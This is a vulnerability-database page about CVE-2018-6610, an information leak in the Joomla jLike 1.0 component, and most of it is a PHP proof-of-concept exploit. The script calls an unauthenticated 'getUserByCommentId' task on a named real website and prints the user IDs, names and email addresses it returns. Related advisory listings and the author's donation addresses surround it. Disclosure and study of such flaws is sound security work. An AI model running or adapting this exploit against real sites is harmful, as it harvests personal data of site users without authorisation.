Lucene search
K

Joomla! jLike 1.0 Information Leak

🗓️ 05 Feb 2018 00:00:00Reported by Ihsan SencanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Joomla! jLike 1.0 Information Leak CVE-2018-661

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Joomla jLike 1.0 Component - Information Leak Exploit
6 Feb 201800:00
zdt
CNVD
Joomla! jLike Component Information Disclosure Vulnerability
6 Feb 201800:00
cnvd
CVE
CVE-2018-6610
5 Feb 201822:00
cve
Cvelist
CVE-2018-6610
5 Feb 201822:00
cvelist
Exploit DB
Joomla! Component jLike 1.0 - Information Leak
5 Feb 201800:00
exploitdb
exploitpack
Joomla! Component jLike 1.0 - Information Leak
5 Feb 201800:00
exploitpack
NVD
CVE-2018-6610
5 Feb 201822:29
nvd
Prion
Server side request forgery (ssrf)
5 Feb 201822:29
prion
`<?php  
# # # # #   
# Exploit Title: Joomla! Component jLike 1.0 - Information Leakage  
# Dork: N/A  
# Date: 04.02.2018  
# Vendor Homepage: http://joomlaserviceprovider.com/  
# Software Link: https://extensions.joomla.org/extensions/extension/social-web/social-share/jlike/  
# Version: 1.0  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-6610  
# # # # #   
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# Want To Donate ?   
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ  
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2  
# # # # #  
# Description:  
# Information Leakage  
#   
# Proof of Concept:   
#   
# 1)  
header ('Content-type: text/html; charset=UTF-8');  
$url= "http://www.projectcontrolsinstitute.com/";  
$p="index.php?option=com_jlike&task=getUserByCommentId&tmpl=component&format=row";  
$url = file_get_contents($url.$p);  
$l = json_decode($url, true);  
if($l){  
echo "*-----------------------------*<br />";  
foreach($l as $u){  
echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />";  
echo "[-] Name\n\n:\n" .$u['name']."<br />";  
echo "[-] Email\n:\n" .$u['email']."<br />";  
echo "<br>";  
}echo "*-----------------------------*";}   
else{echo "[-] No user";}  
?>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2018 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.15026
32